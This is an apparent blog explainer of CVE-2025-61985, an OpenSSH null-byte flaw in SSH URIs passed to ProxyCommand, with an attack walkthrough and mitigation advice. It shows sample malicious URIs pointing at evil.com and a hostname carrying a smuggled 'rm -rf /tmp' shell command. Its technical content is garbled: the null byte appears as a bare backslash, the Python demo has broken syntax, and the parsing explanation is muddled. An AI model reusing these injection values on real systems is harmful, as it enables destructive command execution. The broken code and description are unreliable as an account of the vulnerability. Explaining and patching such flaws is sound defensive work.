OpenSSH has long been one of the most trusted tools for secure remote administration. But recently, a critical vulnerability surfaced—CVE-2025-61985—that puts servers at risk of code execution when handling SSH URIs containing a null byte ('\'). Let’s break down what happened, why it matters, and how an attacker could actually use this flaw, step by step.
What is CVE-2025-61985?
CVE-2025-61985 is a security vulnerability found in versions of OpenSSH before 10.1. The problem lies in how OpenSSH parses SSH URIs that contain the null byte (\) character—specifically in the context of the ProxyCommand configuration.
When a URI like ssh://username@host:22 is provided, OpenSSH parses the string. But, if an attacker adds a \ (null character), for example:
ssh://user@trustedhost\@evil.com
OpenSSH might treat this differently at different layers of its code. For example, *string parsing* might stop at the null byte, but the underlying function calls (especially when issuing a ProxyCommand) process the entire string. This “confusion” can be manipulated to execute unwanted code or connect to attacker-controlled hosts.
Many administrators set up ProxyCommand to let SSH connect through jump hosts, like
ProxyCommand ssh -q gateway.example.com nc %h %p
Exploitation Example: Step By Step
Let’s dig deeper with a hands-on exploitation scenario.
Suppose alice configures her SSH like this in ~/.ssh/config
Host *
ProxyCommand ssh -q proxy.company.com nc %h %p
This means *every SSH connection* tunnels through proxy.company.com.
An attacker sends Alice an SSH URI
ssh://bob@server\@evil.com
(Alice is asked to “help Bob” with his server problem.)
OpenSSH parses username as bob, host as server (doesn’t expect more after \).
- Under the hood, system calls process the string up to the \, but if passed as an argument (for example, in the ProxyCommand), the whole string, including parts after \, can affect execution.
Visual Demonstration
uri = "ssh://bob@server\@evil.com"
host = parse_host(uri) # Returns "server"
system_call(host) # Might receive "server\@evil.com"
When ProxyCommand is run
ssh -q proxy.company.com nc server\@evil.com 22
If the malicious host includes shell metacharacters, like
ssh://bob@server\;rm -rf /tmp;@evil.com
With a naive ProxyCommand use like
ProxyCommand echo %h
This could run
echo server\;rm -rf /tmp;@evil.com
Depending on parsing, rm -rf /tmp may execute!
Here’s a Python script showing how parsing works differently for null bytes
# Simulate parsing in Python (for demonstration)
uri = "ssh://alice@host\@evil.com"
# Parsing logic (simplistic)
host = uri.split('@')[1] # Returns 'host\'
print("Application sees host:", host.split('\')[])
print("Underlying system call gets:", host)
Expected Output
Application sees host: host
Underlying system call gets: host\@evil.com
(In practice, system calls in C/C++ terminate strings at \, but in some proxy commands, unwanted parts may sneak through.)
1. Update OpenSSH
Upgrade to OpenSSH 10.1 or newer immediately! Modern versions reject \ in SSH URIs.
Latest release: OpenSSH releases
2. Harden ProxyCommand
Avoid ProxyCommand values that are shell-interpolated or include %h directly.
3. Sanitize Your Inputs
Never trust hostnames or usernames that aren’t hardcoded or fully validated.
4. Monitor For Abuse
Watch logs for strange SSH invocations, especially those containing \ bytes.
References and Further Reading
- OpenSSH Release Notes: OpenSSH 10.1 release notes
- CVE Entry: NVD CVE-2025-61985
- Linux Security Mailing List: oss-security Post
- OpenSSH ProxyCommand Guide: OpenSSH ProxyJump and ProxyCommand
Closing Thoughts
CVE-2025-61985 is a powerful example of how a tiny parsing bug—the mishandling of the \ null character—can open the door to big trouble when using trusted tools like OpenSSH. Stay up to date, be careful with ProxyCommand, and never let user-controllable strings near your shell commands!
Timeline
Published on: 10/06/2025 19:15:36 UTC
Last modified on: 10/08/2025 19:38:32 UTC